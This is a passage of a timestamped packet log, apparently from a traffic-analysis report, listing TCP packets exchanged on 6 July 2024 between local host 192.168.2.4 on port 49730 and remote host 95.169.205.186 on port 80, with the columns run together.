                                                              Jul 6, 2024 04:21:58.631784916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.631939888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.631951094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.631968975 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.631995916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.632000923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.632006884 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.632016897 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.632028103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.632041931 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.632064104 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.634280920 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634327888 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.634362936 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634376049 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634418964 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.634506941 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634517908 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634527922 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634557009 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.634571075 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.634586096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634597063 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634629965 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.634706020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634715080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634720087 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634728909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634737968 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634749889 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634757042 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.634771109 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.634793043 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.634982109 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.634991884 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635018110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635030985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635032892 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.635041952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635051012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635054111 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.635082960 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.635114908 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.635307074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635318995 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635328054 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635337114 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635356903 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.635392904 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.635571957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635582924 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635592937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635603905 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635613918 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635621071 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.635624886 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635637045 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.635649920 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.635668993 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.635694027 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636048079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636059046 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636069059 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636080027 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636090040 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636092901 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636100054 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636111021 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636116028 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636121988 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636133909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636142969 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636146069 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636154890 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636164904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636167049 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636187077 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636202097 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636727095 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636737108 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636746883 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636758089 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636770964 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636775017 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636786938 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636794090 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636796951 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636809111 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636809111 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636820078 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636831999 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636840105 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.636846066 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636872053 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.636890888 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.637254000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637264013 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637274027 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637284040 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637295008 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637303114 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.637307882 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637319088 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637327909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637336016 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.637339115 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637351036 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.637352943 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637375116 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.637401104 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.637917995 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637928963 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637938023 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637947083 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637958050 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637968063 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.637974024 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637984991 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.637994051 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638000965 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638005018 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638016939 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638022900 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638029099 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638040066 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638046026 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638052940 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638062954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638066053 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638073921 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638077974 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638086081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638096094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638107061 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638112068 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638119936 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638128996 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638134956 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638158083 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638185024 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638695002 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638705969 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638715982 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638725996 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638746023 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638772011 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638823032 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638834000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638843060 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638854027 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638863087 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638870955 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638875008 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638885021 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638886929 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638899088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638900995 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638911963 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638926029 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638926983 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638935089 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.638953924 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.638972998 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.639503002 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639518023 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639527082 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639537096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639547110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639555931 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.639559984 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639571905 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639580965 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.639580965 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639596939 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639599085 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.639610052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639614105 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.639621019 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639631987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639642000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639643908 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.639653921 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639663935 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639669895 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.639676094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.639695883 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.639717102 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.722155094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.722232103 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.722246885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.722259045 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.722275019 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.722291946 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.722300053 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.722305059 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.722318888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.722336054 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.722357988 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.730546951 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.730607986 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.730624914 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.730674982 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.730734110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.730743885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.730778933 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.730869055 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.730878115 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.730923891 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.730999947 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.731009007 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.731053114 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.731136084 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.731182098 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.731251001 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.731303930 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.732960939 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733007908 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.733031988 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733042955 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733083010 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.733228922 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733243942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733287096 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.733297110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733308077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733314037 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733350992 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.733453989 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733464956 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733474970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733510017 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.733524084 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.733712912 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733722925 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733731985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733742952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733752012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733762026 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733763933 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.733773947 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.733797073 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.733815908 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.734112978 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734123945 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734133005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734144926 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734155893 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734162092 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.734167099 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734179020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734180927 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.734189987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734200001 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734206915 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.734225988 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.734244108 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.734658003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734668970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734678030 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734685898 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734695911 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734713078 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734714031 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.734721899 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734733105 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734743118 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734743118 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.734755039 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734765053 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.734766006 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.734776020 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.734806061 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.735275030 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735285997 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735296965 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735306978 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735316992 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735317945 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.735328913 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735340118 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735348940 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735354900 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.735361099 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735368967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735378981 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735389948 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.735392094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735403061 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735409975 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.735414028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735428095 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.735436916 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.735461950 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.736041069 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736051083 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736059904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736072063 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736082077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736093044 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736089945 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.736104965 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736105919 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.736115932 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736126900 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736129045 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.736150026 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.736165047 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.736603975 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736618996 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736628056 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736638069 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736648083 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736658096 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.736660004 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736671925 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736681938 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736687899 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.736692905 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736705065 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736710072 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.736716986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736726999 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736732960 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.736737967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.736752987 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.736778975 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.737210989 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.737231970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.737243891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.737253904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.737266064 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.737267017 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.737278938 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.737289906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.737298012 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.737301111 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.737313032 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.737322092 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.737328053 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.737333059 CEST804973095.169.205.186192.168.2.4
